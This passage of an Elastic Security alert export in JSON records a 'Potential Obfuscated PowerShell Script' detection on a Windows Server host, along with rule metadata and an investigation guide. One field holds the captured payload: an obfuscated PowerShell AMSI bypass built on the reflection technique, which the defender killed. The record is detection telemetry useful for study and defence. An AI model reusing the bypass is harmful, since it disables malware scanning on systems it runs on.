triggered by routine software updates can be false positives. Users can create exceptions for known update processes to prevent unnecessary alerts.\n- System maintenance activities, such as scheduled scans or backups, may generate alerts. Exclude these activities by identifying their specific event signatures and adding them to the exception list.\n- Legitimate administrative actions, like remote desktop sessions or script executions by IT staff, might be flagged. Define exceptions for these actions by correlating them with authorized user accounts or IP addresses.\n- Frequent alerts from non-malicious applications that interact with system processes can be excluded by whitelisting these applications based on their hash or path.\n- Network monitoring tools that simulate attack patterns for testing purposes may trigger alerts. Exclude these tools by specifying their known behaviors and IP ranges in the exception settings.\n\n### Response and remediation\n\n- Isolate the affected endpoint immediately to prevent further unauthorized access or lateral movement within the network.\n- Analyze the alert details to identify the specific unauthorized code or process manipulation involved, and terminate any malicious processes identified.\n- Remove any unauthorized code or files from the affected endpoint, ensuring that all traces of the threat are eradicated.\n- Conduct a thorough review of system logs and event data to identify any additional indicators of compromise or related suspicious activities.\n- Update endpoint security configurations and signatures to prevent similar threats from exploiting the same vulnerabilities in the future.\n- Restore the affected endpoint from a known good backup if necessary, ensuring that the system is free from any residual threats.\n- Escalate the incident to the security operations center (SOC) or relevant team for further analysis and to determine if additional systems may be affected.", | |
| "kibana.alert.rule.references": [], | |
| "kibana.alert.rule.risk_score_mapping": [ | |
| { | |
| "field": "event.risk_score", | |
| "operator": "equals", | |
| "value": "" | |
| } | |
| ], | |
| "kibana.alert.rule.rule_id": "9a1a2dae-0b5f-4c3d-8305-a268d404c306", | |
| "kibana.alert.rule.rule_name_override": "message", | |
| "kibana.alert.rule.severity_mapping": [ | |
| { | |
| "field": "event.severity", | |
| "operator": "equals", | |
| "severity": "low", | |
| "value": "21" | |
| }, | |
| { | |
| "field": "event.severity", | |
| "operator": "equals", | |
| "severity": "medium", | |
| "value": "47" | |
| }, | |
| { | |
| "field": "event.severity", | |
| "operator": "equals", | |
| "severity": "high", | |
| "value": "73" | |
| }, | |
| { | |
| "field": "event.severity", | |
| "operator": "equals", | |
| "severity": "critical", | |
| "value": "99" | |
| } | |
| ], | |
| "kibana.alert.rule.threat": [], | |
| "kibana.alert.rule.timestamp_override": "event.ingested", | |
| "kibana.alert.rule.to": "now", | |
| "kibana.alert.rule.type": "query", | |
| "kibana.alert.rule.updated_at": "2025-08-25T09:37:22.832Z", | |
| "kibana.alert.rule.updated_by": "586246785", | |
| "kibana.alert.rule.version": 108, | |
| "kibana.alert.url": "https://samir.kb.us-central1.gcp.cloud.es.io/app/security/alerts/redirect/f5416543d2a90170e669a1304a4a3afd73311220b52072064b09c619f5e31659?index=.alerts-security.alerts-default×tamp=2025-10-14T15:22:17.361Z", | |
| "kibana.alert.uuid": "f5416543d2a90170e669a1304a4a3afd73311220b52072064b09c619f5e31659", | |
| "kibana.alert.workflow_tags": [], | |
| "kibana.alert.workflow_assignee_ids": [], | |
| "kibana.alert.rule.risk_score": 47, | |
| "kibana.alert.rule.severity": "medium", | |
| "kibana.alert.intended_timestamp": "2025-10-14T15:22:17.361Z", | |
| "kibana.alert.rule.execution.type": "scheduled" | |
| }, | |
| "fields": { | |
| "host.os.full.text": [ | |
| "Windows Server 2019 Standard 1809 (10.0.17763.2061)" | |
| ], | |
| "kibana.alert.rule.updated_by": [ | |
| "586246785" | |
| ], | |
| "host.os.name.text": [ | |
| "Windows" | |
| ], | |
| "kibana.alert.rule.rule_name_override": [ | |
| "message" | |
| ], | |
| "process.hash.sha256": [ | |
| "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c" | |
| ], | |
| "host.hostname": [ | |
| "win-svr-2019-st" | |
| ], | |
| "signal.original_event.created": [ | |
| "2025-10-14T15:21:30.576Z" | |
| ], | |
| "host.mac": [ | |
| "00-50-56-11-7d-d9", | |
| "0a-00-27-00-00-04" | |
| ], | |
| "elastic.agent.id": [ | |
| "6570a119-1004-44eb-b3eb-5324657de79e" | |
| ], | |
| "Events.event.outcome": [ | |
| "unknown" | |
| ], | |
| "signal.rule.enabled": [ | |
| "true" | |
| ], | |
| "host.os.version": [ | |
| "1809 (10.0.17763.2061)" | |
| ], | |
| "signal.rule.max_signals": [ | |
| 1000 | |
| ], | |
| "kibana.alert.risk_score": [ | |
| 73 | |
| ], | |
| "signal.rule.updated_at": [ | |
| "2025-08-25T09:37:22.832Z" | |
| ], | |
| "Endpoint.policy.applied.id": [ | |
| "27c05512-d3ed-4826-9f1d-d8876a66d61a" | |
| ], | |
| "kibana.alert.original_event.id": [ | |
| "OCsWZ8Jp4Gz3668A++++g348" | |
| ], | |
| "event.severity": [ | |
| 73 | |
| ], | |
| "Responses.action.action": [ | |
| "kill_process" | |
| ], | |
| "host.os.type": [ | |
| "windows" | |
| ], | |
| "signal.original_event.code": [ | |
| "behavior" | |
| ], | |
| "kibana.alert.original_event.module": [ | |
| "endpoint" | |
| ], | |
| "kibana.alert.rule.interval": [ | |
| "1m" | |
| ], | |
| "kibana.alert.rule.type": [ | |
| "query" | |
| ], | |
| "kibana.alert.rule.immutable": [ | |
| "true" | |
| ], | |
| "kibana.alert.rule.exceptions_list.list_id": [ | |
| "endpoint_list" | |
| ], | |
| "threat.technique.subtechnique.name": [ | |
| "PowerShell" | |
| ], | |
| "process.Ext.api.parameters.buffer": [ | |
| "$MV3l1C=$null;$rWS16tHn4=\"System.$(('Mánäg'+'èmênt').NoRmAliZE([Char](70)+[cHAR](111)+[ChaR](114+75-75)+[cHAR](65+44)+[chAr]([ByTe]0x44)) -replace [cHar](92*70/70)+[Char]([bytE]0x70)+[ChaR]([ByTE]0x7b)+[Char](77)+[chaR](108+2)+[chAR]([byTE]0x7d)).$(('Äú'+'tô'+'mä'+'tì'+'õn').NOrmaliZe([chAr](70*53/53)+[CHaR]([bytE]0x6f)+[cHaR]([BYTE]0x72)+[chAr](109)+[cHAr](10+58)) -replace [chAr](92+90-90)+[chAr]([bYTE]0x70)+[chAR](123+7-7)+[cHaR]([bYte]0x4d)+[cHAr]([bytE]0x6e)+[ChAR]([bYTe]0x7d)).$(('Á'+'m'+'s'+'î'+'Ù'+'t'+'í'+'l'+'s').nORMalIze([CHAR](14+56)+[chAR]([bYtE]0x6f)+[chAr]([bYte]0x72)+[CHaR](109*15/15)+[char]([bYtE]0x44)) -replace [CHAR](92+51-51)+[ChaR]([BYte]0x70)+[chaR]([Byte]0x7b)+[chAR]([BytE]0x4d)+[ChAR]([bytE]0x6e)+[ChaR](125))\";$igaqlsqbbrpoqjdswzgcmyrdbwdoj=\"+[chaR](99*97/97)+[CHAr]([BYTE]0x72)+[cHar]([byte]0x71)+[CHar](100+3-3)+[CHAR]([ByTE]0x65)+[Char](103*40/40)+[chAR](117*11/11)+[ChAr](115+45-45)+[cHAR](120)+[cHaR](113)+[cHAr]([BYTE]0x78)+[CHar]([bYtE]0x6b)+[Char](64+40)+[cHAR]([BYtE]0x62)+[CHAr]([BYte]0x7a)+[char](71+38)+[CHar]([byTE]0x6f)+[chAr](105*92/92)+[CHAR]([byte]0x66)+[Char](111+37-37)+[Char]([BYte]0x64)+[cHAr]([byTe]0x6a)\";[Threading.Thread]::Sleep(1873);[Ref].Assembly.GetType($rWS16tHn4).GetField($(('àmsì'+'Înít'+'Fâíl'+'êd').NOrMaLIze([CHAR](30+40)+[chAR]([BYTe]0x6f)+[char](114)+[cHar]([BYte]0x6d)+[chAr](1+67)) -replace [CHAr](44+48)+[chAR](112+105-105)+[chaR](123+92-92)+[chAr](77)+[CHAR]([Byte]0x6e)+[CHaR]([byte]0x7d)),\"NonPublic,Static\").SetValue($MV3l1C,$true);$qrxwkay=\"+[ChAr]([Byte]0x69)+[chAR]([byte]0x6e)+[ChaR]([byte]0x7a)+[cHAr]([BYTE]0x72)+[chAR](97+56-56)+[CHar]([bYtE]0x64)+[CHar](115)+[char]([bytE]0x61)+[cHAR](121)+[cHar]([BYtE]0x6e)+[chAR]([bytE]0x67)+[ChaR](98+77-77)+[CHaR](54+46)+[chAR]([bYTe]0x79)+[ChaR](61+46)+[ChAR](116)+[CHar](97*85/85)+[cHaR]([byTe]0x62)+[ChAR]([ByTE]0x6b)\";[Threading.Thread]::Sleep(1232)\n#Matt Graebers Reflection method " | |
| ], | |
| "Endpoint.policy.applied.artifacts.global.manifest_type": [ | |
| "stable" | |
| ], | |
| "kibana.alert.rule.version": [ | |
| "108" | |
| ], | |
| "Events.process.code_signature.trusted": [ | |
| true | |
| ], | |
| "process.command_line.text": [ | |
| "powershell" | |
| ], | |
| "Events.process.parent.executable": [ | |
| "C:\\Windows\\System32\\cmd.exe" | |
| ], | |
| "Events.host.mac": [ | |
| "00-50-56-11-7d-d9", | |
| "0a-00-27-00-00-04" | |
| ], | |
| "signal.original_event.outcome": [ | |
| "success" | |
| ], | |
| "threat.framework": [ | |
| "MITRE ATT&CK" | |
| ], | |
| "process.Ext.api.parameters.app_name": [ | |
| "PowerShell" | |
| ], | |
| "process.entity_id": [ | |
| "Fr+lArd4jbWUm9nDJqjXuw" | |
| ], | |
| "host.ip": [ | |
| "10.0.0.19", | |
| "fe80::382c:f652:1d40:ee4e", | |
| "192.168.56.1", | |
| "fe80::5d9e:2b92:1905:13a8", | |
| "127.0.0.1", | |
| "::1" | |
| ], | |
| "agent.type": [ | |
| "endpoint" | |
| ], | |
| "process.pe.original_file_name": [ | |
| "PowerShell.EXE" | |
| ], | |
| "process.executable.text": [ | |
| "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" | |
| ], | |
| "signal.original_event.category": [ | |
| "malware", | |
| "intrusion_detection" | |
| ], | |
| "Events.user.id": [ | |
| "S-1-5-21-2202811333-351044183-798744757-500" | |
| ], | |
| "Events.process.command_line": [ | |
| "powershell" | |
| ], | |
| "Endpoint.policy.applied.name": [ | |
| "myDefend" | |
| ], | |
| "host.id": [ | |
| "cb7eef6d-979b-434c-b48f-5a91a9c6cfcf" | |
| ], | |
| "process.Ext.code_signature.subject_name": [ | |
| "Microsoft Windows" | |
| ], | |
| "Responses.@timestamp": [ | |
| "2025-10-14T15:21:30.5966574Z" | |
| ], | |
| "Events.@timestamp": [ | |
| "2025-10-14T15:21:30.2270851Z" | |
| ], | |
| "Endpoint.policy.applied.artifacts.global.channel": [ | |
| "default" | |
| ], | |
| "Events.user.name": [ | |
| "Administrator" | |
| ], | |
| "kibana.alert.rule.indices": [ | |
| "logs-endpoint.alerts-*" | |
| ], | |
| "host.os.Ext.variant": [ | |
| "Windows Server 2019 Standard" | |
| ], | |
| "signal.rule.updated_by": [ | |
| "586246785" | |
| ], | |
| "host.os.platform": [ | |
| "windows" | |
| ], | |
| "kibana.alert.intended_timestamp": [ | |
| "2025-10-14T15:22:17.361Z" | |
| ], | |
| "kibana.alert.rule.severity": [ | |
| "medium" | |
| ], | |
| "Endpoint.policy.applied.artifacts.user.identifiers.sha256": [ | |
| "d801aa1fb7ddcc330a5e3173372ea6af4a3d08ec58074478e85aa5603e926658", | |
| "d801aa1fb7ddcc330a5e3173372ea6af4a3d08ec58074478e85aa5603e926658", | |
| "d801aa1fb7ddcc330a5e3173372ea6af4a3d08ec58074478e85aa5603e926658", | |
| "d801aa1fb7ddcc330a5e3173372ea6af4a3d08ec58074478e85aa5603e926658", | |
| "d801aa1fb7ddcc330a5e3173372ea6af4a3d08ec58074478e85aa5603e926658" | |
| ], | |
| "kibana.alert.rule.execution.timestamp": [ | |
| "2025-10-14T15:22:17.403Z" | |
| ], | |
| "Events.process.Ext.token.integrity_level_name": [ | |
| "high" | |
| ], | |
| "kibana.version": [ | |
| "9.1.2" | |
| ], | |
| "event.id": [ | |
| "OCsWZ8Jp4Gz3668A++++g348" | |
| ], | |
| "signal.ancestors.type": [ | |
| "event" | |
| ], | |
| "user.name.text": [ | |
| "Administrator" | |
| ], | |
| "Events.event.provider": [ | |
| "Microsoft-Antimalware-Scan-Interface" | |
| ], | |
| "kibana.alert.ancestors.id": [ | |
| "AZnjUAfs4fyCfCR7INh3" | |
| ], | |
| "process.name.text": [ | |
| "powershell.exe" | |
| ], | |
| "host.os.full": [ | |
| "Windows Server 2019 Standard 1809 (10.0.17763.2061)" | |
| ], | |
| "kibana.alert.original_data_stream.namespace": [ | |
| "default" | |
| ], | |
| "kibana.alert.original_event.code": [ | |
| "behavior" | |
| ], | |
| "Endpoint.policy.applied.artifacts.global.identifiers.name": [ | |
| "diagnostic-configuration-v1", | |
| "diagnostic-endpointpe-v4-blocklist", | |
| "diagnostic-endpointpe-v4-exceptionlist", | |
| "diagnostic-endpointpe-v4-model", | |
| "diagnostic-malware-signature-v1-windows", | |
| "diagnostic-ransomware-v1-windows", | |
| "diagnostic-rules-windows-v1", | |
| "endpointpe-v4-blocklist", | |
| "endpointpe-v4-exceptionlist", | |
| "endpointpe-v4-model", | |
| "global-configuration-v1", | |
| "global-eventfilterlist-windows-v1", | |
| "global-exceptionlist-windows", | |
| "global-trustlist-windows-v1", | |
| "production-malware-signature-v1-windows", | |
| "production-ransomware-v1-windows", | |
| "production-rules-windows-v1", | |
| "tamper-protection-config-v1" | |
| ], | |
| "kibana.alert.rule.description": [ | |
| "Generates a detection alert each time an Elastic Defend alert is received. Enabling this rule allows you to immediately begin investigating your Endpoint alerts." | |
| ], | |
| "process.Ext.api.summary": [ | |
| "AmsiScanBuffer( PowerShell, NULL, 69238e486d9598d02da6f03bbb7abd998911e42c5936619f4c00e4ff0cd598c9 )" | |
| ], | |
| "kibana.alert.rule.producer": [ | |
| "siem" | |
| ], | |
| "kibana.alert.rule.to": [ | |
| "now" | |
| ], | |
| "Endpoint.policy.applied.artifacts.user.version": [ | |
| "1.0.0" | |
| ], | |
| "kibana.alert.original_event.ingested": [ | |
| "2025-10-14T15:22:06.000Z" | |
| ], | |
| "signal.rule.id": [ | |
| "0a1f09ab-3c54-44a0-b434-b6af4e252a3f" | |
| ], | |
| "rule.ruleset": [ | |
| "production" | |
| ], | |
| "signal.reason": [ | |
| "malware, intrusion_detection event with process powershell.exe, by Administrator on win-svr-2019-st created high alert Malicious Behavior Prevention Alert: Potential Obfuscated PowerShell Script." | |
| ], | |
| "signal.rule.risk_score": [ | |
| 73 | |
| ], | |
| "host.os.name": [ | |
| "Windows" | |
| ], | |
| "Responses.action.field": [ | |
| "process.entity_id" | |
| ], | |
| "process.Ext.api.metadata.return_value": [ | |
| 1 | |
| ], | |
| "signal.status": [ | |
| "open" | |
| ], | |
| "Events.host.os.full": [ | |
| "Windows Server 2019 Standard 1809 (10.0.17763.2061)" | |
| ], | |
| "kibana.alert.rule.severity_mapping.value": [ | |
| "21", | |
| "47", | |
| "73", | |
| "99" | |
| ], | |
| "signal.rule.tags": [ | |
| "Data Source: Elastic Defend", | |
| "Resources: Investigation Guide" | |
| ], | |
| "rule.name": [ | |
| "Potential Obfuscated PowerShell Script" | |
| ], | |
| "kibana.alert.rule.uuid": [ | |
| "0a1f09ab-3c54-44a0-b434-b6af4e252a3f" | |
| ], | |
| "Events.process.executable": [ | |
| "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" | |
| ], | |
| "kibana.alert.original_event.category": [ | |
| "malware", | |
| "intrusion_detection" | |
| ], | |
| "signal.original_event.risk_score": [ | |
| 73 | |
| ], | |
| "Events.host.os.name": [ | |
| "Windows" | |
| ], | |
| "Responses.process.entity_id": [ | |
| "Fr+lArd4jbWUm9nDJqjXuw" | |
| ], | |
| "rule.description": [ | |
| "Identifies the execution of PowerShell with potentially obfuscated content. This behavior is often observed during malware installation leveraging PowerShell." | |
| ], | |
| "threat.technique.id": [ | |
| "T1059" | |
| ], | |
| "Events.process.Ext.api.name": [ | |
| "AmsiScanBuffer" | |
| ], | |
| "Events.process.name": [ | |
| "powershell.exe" | |
| ], | |
| "process.name": [ | |
| "powershell.exe" | |
| ], | |
| "Events.process.Ext.code_signature.status": [ | |
| "trusted" | |
| ], | |
| "process.parent.executable.text": [ | |
| "C:\\Windows\\System32\\cmd.exe" | |
| ], | |
| "Events.process.code_signature.status": [ | |
| "trusted" | |
| ], | |
| "kibana.alert.ancestors.index": [ | |
| ".ds-logs-endpoint.alerts-default-2025.09.24-000002" | |
| ], | |
| "process.Ext.code_signature.trusted": [ | |
| true | |
| ], | |
| "Events.process.Ext.api.summary": [ | |
| "AmsiScanBuffer( PowerShell, NULL, 69238e486d9598d02da6f03bbb7abd998911e42c5936619f4c00e4ff0cd598c9 )" | |
| ], | |
| "agent.version": [ | |
| "9.1.2" | |
| ], | |
| "signal.original_event.severity": [ | |
| 73 | |
| ], | |
| "kibana.alert.rule.risk_score_mapping.operator": [ | |
| "equals" | |
| ], | |
| "host.os.family": [ | |
| "windows" | |
| ], | |
| "kibana.alert.rule.from": [ | |
| "now-2m" | |
| ], | |
| "kibana.alert.rule.parameters": [ | |
| { | |
| "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Endpoint Security (Elastic Defend)\n\nElastic Defend is a robust endpoint security solution that monitors and protects systems by analyzing events and generating alerts for suspicious activities. Adversaries may exploit endpoints by executing unauthorized code or manipulating system processes. The detection rule leverages event data to identify alerts from Elastic Defend, focusing on potential threats while excluding non-relevant modules, thus enabling timely investigation of endpoint anomalies.\n\n### Possible investigation steps\n\n- Review the alert details to understand the specific event.kind:alert and event.module: endpoint that triggered the alert, ensuring it is not related to the excluded endgame module.\n- Examine the timeline of events leading up to the alert to identify any unusual or unauthorized activities, such as unexpected process executions or system changes.\n- Correlate the alert with other security events or logs from the same endpoint to gather additional context and determine if there is a pattern of suspicious behavior.\n- Investigate the source and destination of any network connections associated with the alert to identify potential command and control activity or data exfiltration attempts.\n- Check for any recent changes or updates to the endpoint's software or configuration that could explain the alert, ensuring they are legitimate and authorized.\n- Assess the risk score and severity of the alert in conjunction with other alerts from the same endpoint to prioritize the investigation and response efforts.\n\n### False positive analysis\n\n- Alerts triggered by routine 
software updates can be false positives. Users can create exceptions for known update processes to prevent unnecessary alerts.\n- System maintenance activities, such as scheduled scans or backups, may generate alerts. Exclude these activities by identifying their specific event signatures and adding them to the exception list.\n- Legitimate administrative actions, like remote desktop sessions or script executions by IT staff, might be flagged. Define exceptions for these actions by correlating them with authorized user accounts or IP addresses, but scope them narrowly: an administrative account or a trusted source address is not by itself evidence that the activity is benign, since attackers routinely operate from compromised privileged accounts.\n- Frequent alerts from non-malicious applications that interact with system processes can be excluded by adding exceptions for these applications, preferably keyed on their file hash or code-signing identity rather than on executable path alone, since a path can be reused by an attacker.\n- Network monitoring tools that simulate attack patterns for testing purposes may trigger alerts. Exclude these tools by specifying their known behaviors and IP ranges in the exception settings.\n\n### Response and remediation\n\n- Isolate the affected endpoint immediately to prevent further unauthorized access or lateral movement within the network.\n- Analyze the alert details to identify the specific unauthorized code or process manipulation involved, and terminate any malicious processes identified.\n- Remove any unauthorized code or files from the affected endpoint, ensuring that all traces of the threat are eradicated.\n- Conduct a thorough review of system logs and event data to identify any additional indicators of compromise or related suspicious activities.\n- Update endpoint security configurations and signatures to prevent similar threats from exploiting the same vulnerabilities in the future.\n- Restore the affected endpoint from a known good backup if necessary, ensuring that the system is free from any residual threats.\n- Escalate the incident to the security operations center (SOC) or relevant team for further analysis and to determine if additional systems may be affected.", | |
| "severity_mapping": [ | |
| { | |
| "field": "event.severity", | |
| "operator": "equals", | |
| "severity": "low", | |
| "value": "21" | |
| }, | |
| { | |
| "field": "event.severity", | |
| "operator": "equals", | |
| "severity": "medium", | |
| "value": "47" | |
| }, | |
| { | |
| "field": "event.severity", | |
| "operator": "equals", | |
| "severity": "high", | |
| "value": "73" | |
| }, | |
| { | |
| "field": "event.severity", | |
| "operator": "equals", | |
| "severity": "critical", | |
| "value": "99" | |
| } | |
| ], | |
| "description": "Generates a detection alert each time an Elastic Defend alert is received. Enabling this rule allows you to immediately begin investigating your Endpoint alerts.", | |
| "language": "kuery", | |
| "type": "query", | |
| "rule_name_override": "message", | |
| "exceptions_list": { | |
| "id": "endpoint_list", | |
| "list_id": "endpoint_list", | |
| "type": "endpoint", | |
| "namespace_type": "agnostic" | |
| }, | |
| "timestamp_override": "event.ingested", | |
| "from": "now-2m", | |
| "severity": "medium", | |
| "max_signals": 1000, | |
| "rule_source": { | |
| "type": "external", | |
| "is_customized": false | |
| }, | |
| "risk_score": 47, | |
| "risk_score_mapping": { | |
| "field": "event.risk_score", | |
| "operator": "equals", | |
| "value": "" | |
| }, | |
| "author": "Elastic", | |
| "query": "event.kind:alert and event.module:(endpoint and not endgame)\n", | |
| "index": "logs-endpoint.alerts-*", | |
| "version": 108, | |
| "rule_id": "9a1a2dae-0b5f-4c3d-8305-a268d404c306", | |
| "license": "Elastic License v2", | |
| "required_fields": [ | |
| { | |
| "name": "event.kind", | |
| "type": "keyword", | |
| "ecs": true | |
| }, | |
| { | |
| "name": "event.module", | |
| "type": "keyword", | |
| "ecs": true | |
| } | |
| ], | |
| "immutable": true, | |
| "related_integrations": { | |
| "package": "endpoint", | |
| "version": "^9.0.0" | |
| }, | |
| "setup": "## Setup\n\n### Elastic Defend Alerts\nIf this rule is disabled, you will not receive alerts for Elastic Defend alerts. This rule is designed to capture all alerts generated by Elastic Defend. For more granular alerting, consider using additional prebuilt-rules that capture specific Elastic Defend alerts.\n\nIf this rule is enabled, along with the related rules listed below, you will receive duplicate alerts for the same events. To avoid this, it is recommended to disable this generic rule and enable the more specific rules that capture these alerts separately.\n\nRelated rules:\n- Behavior - Detected - Elastic Defend (UUID: 0f615fe4-eaa2-11ee-ae33-f661ea17fbce)\n- Behavior - Prevented - Elastic Defend (UUID: eb804972-ea34-11ee-a417-f661ea17fbce)\n- Malicious File - Detected - Elastic Defend (UUID: f2c3caa6-ea34-11ee-a417-f661ea17fbce)\n- Malicious File - Prevented - Elastic Defend (UUID: f87e6122-ea34-11ee-a417-f661ea17fbce)\n- Memory Threat - Detected - Elastic Defend (UUID: 017de1e4-ea35-11ee-a417-f661ea17fbce)\n- Memory Threat - Prevented - Elastic Defend (UUID: 06f3a26c-ea35-11ee-a417-f661ea17fbce)\n- Ransomware - Detected - Elastic Defend (UUID: 0c74cd7e-ea35-11ee-a417-f661ea17fbce)\n- Ransomware - Prevented - Elastic Defend (UUID: 10f3d520-ea35-11ee-a417-f661ea17fbce)\n\n### Additional notes\n\nFor information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts).\n", | |
| "to": "now" | |
| } | |
| ], | |
| "signal.original_event.kind": [ | |
| "alert" | |
| ], | |
| "threat.technique.name": [ | |
| "Command and Scripting Interpreter" | |
| ], | |
| "Responses.message": [ | |
| "Success" | |
| ], | |
| "Events.event.type": [ | |
| "allowed" | |
| ], | |
| "Events.event.created": [ | |
| "2025-10-14T15:21:30.5741785Z" | |
| ], | |
| "signal.depth": [ | |
| 1 | |
| ], | |
| "signal.rule.immutable": [ | |
| "true" | |
| ], | |
| "process.Ext.api.name": [ | |
| "AmsiScanBuffer" | |
| ], | |
| "event.sequence": [ | |
| 106319 | |
| ], | |
| "signal.rule.name": [ | |
| "Malicious Behavior Prevention Alert: Potential Obfuscated PowerShell Script" | |
| ], | |
| "event.module": [ | |
| "endpoint" | |
| ], | |
| "kibana.alert.rule.severity_mapping.operator": [ | |
| "equals", | |
| "equals", | |
| "equals", | |
| "equals" | |
| ], | |
| "host.os.kernel": [ | |
| "1809 (10.0.17763.2061)" | |
| ], | |
| "kibana.alert.rule.license": [ | |
| "Elastic License v2" | |
| ], | |
| "kibana.alert.original_event.kind": [ | |
| "alert" | |
| ], | |
| "Endpoint.policy.applied.artifacts.global.update_age": [ | |
| 0 | |
| ], | |
| "signal.rule.description": [ | |
| "Generates a detection alert each time an Elastic Defend alert is received. Enabling this rule allows you to immediately begin investigating your Endpoint alerts." | |
| ], | |
| "process.args": [ | |
| "powershell" | |
| ], | |
| "message": [ | |
| "Malicious Behavior Prevention Alert: Potential Obfuscated PowerShell Script" | |
| ], | |
| "Responses.process.name": [ | |
| "powershell.exe" | |
| ], | |
| "rule.version": [ | |
| "1.0.4" | |
| ], | |
| "kibana.alert.original_event.outcome": [ | |
| "success" | |
| ], | |
| "kibana.alert.original_event.sequence": [ | |
| 106319 | |
| ], | |
| "kibana.alert.original_data_stream.type": [ | |
| "logs" | |
| ], | |
| "threat.technique.subtechnique.id": [ | |
| "T1059.001" | |
| ], | |
| "kibana.alert.rule.exceptions_list.namespace_type": [ | |
| "agnostic" | |
| ], | |
| "threat.technique.reference": [ | |
| "https://attack.mitre.org/techniques/T1059/" | |
| ], | |
| "kibana.space_ids": [ | |
| "default" | |
| ], | |
| "kibana.alert.severity": [ | |
| "high" | |
| ], | |
| "rule.id": [ | |
| "f4db84b1-13d8-432d-999a-54a09784e62b" | |
| ], | |
| "Responses.result": [ | |
| 0 | |
| ], | |
| "signal.ancestors.depth": [ | |
| 0 | |
| ], | |
| "event.category": [ | |
| "malware", | |
| "intrusion_detection" | |
| ], | |
| "Endpoint.policy.applied.artifacts.global.identifiers.sha256": [ | |
| "44341700c27a82d3b4a8471cfe8a57447fc6ddbac8f1e855707dd3767e9491e2", | |
| "338eb3e0d0c2b7efcd291ca270a0a6188d3632a25c7a8dc5d020fdb44293e12f", | |
| "9399bb8a3210f3ffea4e028eb3d087455bab6678df8b56ad77f276ee376533ef", | |
| "eae3c9a96708f28da4346ee245b8d673642ee9295e0f0aa4192889d4ade3616a", | |
| "fd827c57f7b99723b3f6f7dbf0c2644ac5147f4ebbe320edc6ccd4b7ce68001c", | |
| "9636fb1bda16d4dc236d40d2aeb379f30d81276028e9b3048002e3ca6a83dfb5", | |
| "81af5fca19bd11e5f167685e1b638ad360d08c39af8264144464e6991019ad28", | |
| "1c0de0df678f1e42eed7635722be3e82fd6731585bc2618086d126ec9b70121b", | |
| "6aa317caa75a727cb988c45e8af7d5c0fc5e722a6322aad190bc3c8bf56c2e3d", | |
| "cf2335c28acaee3072ffd893f229242be71ba75043ae96576227f9fea651c497", | |
| "85501044f22938c806155e33a171abbce9eb4c1544d45d45c6c049c7cb1395d7", | |
| "3a6bf42f273a2e663d9ad273b445cca21d9da8bb336f6f62b262dc55598e1005", | |
| "f50a756ecf8fd5c4fbe40efbec2bac52f9deb1dab44850f107b4b27663406573", | |
| "aaeab218a20828574c347e88ecb4eb411ffca9e8496c484327b2213f49e1dc9e", | |
| "1fa3b2936f9cc7adcef6d0af6803f32cb1e965b1297056620396ce31605151ac", | |
| "e3efc40c7e3fc0a590a074011abf990ab120f9f182b3dbca7b32ee58d0e5c3aa", | |
| "608fb0db8fa37493c5cdcbb4e319ff911937bb8b021efc3efb7d58d1cf88d3bf", | |
| "07f2a166efe84d3b52b6cd8b841f33ffe6eb8e2297cefd4eaa3e50e567b4d30e" | |
| ], | |
| "Events.host.ip": [ | |
| "10.0.0.19", | |
| "fe80::382c:f652:1d40:ee4e", | |
| "192.168.56.1", | |
| "fe80::5d9e:2b92:1905:13a8", | |
| "127.0.0.1", | |
| "::1" | |
| ], | |
| "kibana.alert.original_event.risk_score": [ | |
| 73 | |
| ], | |
| "kibana.alert.rule.tags": [ | |
| "Data Source: Elastic Defend", | |
| "Resources: Investigation Guide" | |
| ], | |
| "process.code_signature.exists": [ | |
| true | |
| ], | |
| "kibana.alert.reason.text": [ | |
| "malware, intrusion_detection event with process powershell.exe, by Administrator on win-svr-2019-st created high alert Malicious Behavior Prevention Alert: Potential Obfuscated PowerShell Script." | |
| ], | |
| "Events.process.Ext.code_signature.trusted": [ | |
| true | |
| ], | |
| "kibana.alert.ancestors.depth": [ | |
| 0 | |
| ], | |
| "threat.technique.name.text": [ | |
| "Command and Scripting Interpreter" | |
| ], | |
| "Events.host.id": [ | |
| "cb7eef6d-979b-434c-b48f-5a91a9c6cfcf" | |
| ], | |
| "kibana.alert.rule.severity_mapping.severity": [ | |
| "low", | |
| "medium", | |
| "high", | |
| "critical" | |
| ], | |
| "agent.build.original": [ | |
| "version: 9.1.2, compiled: Thu Aug 7 15:00:00 2025, branch: HEAD, commit: 26c15136855b7ac73fdaa74b77e6492f254420c5" | |
| ], | |
| "event.agent_id_status": [ | |
| "verified" | |
| ], | |
| "Events.process.Ext.api.parameters.app_name": [ | |
| "PowerShell" | |
| ], | |
| "Events.process.Ext.api.metadata.return_value": [ | |
| 1 | |
| ], | |
| "event.outcome": [ | |
| "success" | |
| ], | |
| "Events.event.kind": [ | |
| "event" | |
| ], | |
| "kibana.alert.rule.risk_score_mapping.value": [ | |
| "" | |
| ], | |
| "process.Ext.api.parameters.size": [ | |
| 3822 | |
| ], | |
| "user.id": [ | |
| "S-1-5-21-2202811333-351044183-798744757-500" | |
| ], | |
| "signal.original_event.sequence": [ | |
| 106319 | |
| ], | |
| "event.risk_score": [ | |
| 73 | |
| ], | |
| "Events.host.hostname": [ | |
| "win-svr-2019-st" | |
| ], | |
| "threat.technique.subtechnique.reference": [ | |
| "https://attack.mitre.org/techniques/T1059/001/" | |
| ], | |
| "host.architecture": [ | |
| "x86_64" | |
| ], | |
| "kibana.alert.start": [ | |
| "2025-10-14T15:22:17.403Z" | |
| ], | |
| "process.Ext.code_signature.status": [ | |
| "trusted" | |
| ], | |
| "event.code": [ | |
| "behavior" | |
| ], | |
| "kibana.alert.original_event.type": [ | |
| "info", | |
| "denied" | |
| ], | |
| "agent.id": [ | |
| "6570a119-1004-44eb-b3eb-5324657de79e" | |
| ], | |
| "signal.original_event.module": [ | |
| "endpoint" | |
| ], | |
| "signal.rule.from": [ | |
| "now-2m" | |
| ], | |
| "kibana.alert.rule.exceptions_list.type": [ | |
| "endpoint" | |
| ], | |
| "kibana.alert.rule.enabled": [ | |
| "true" | |
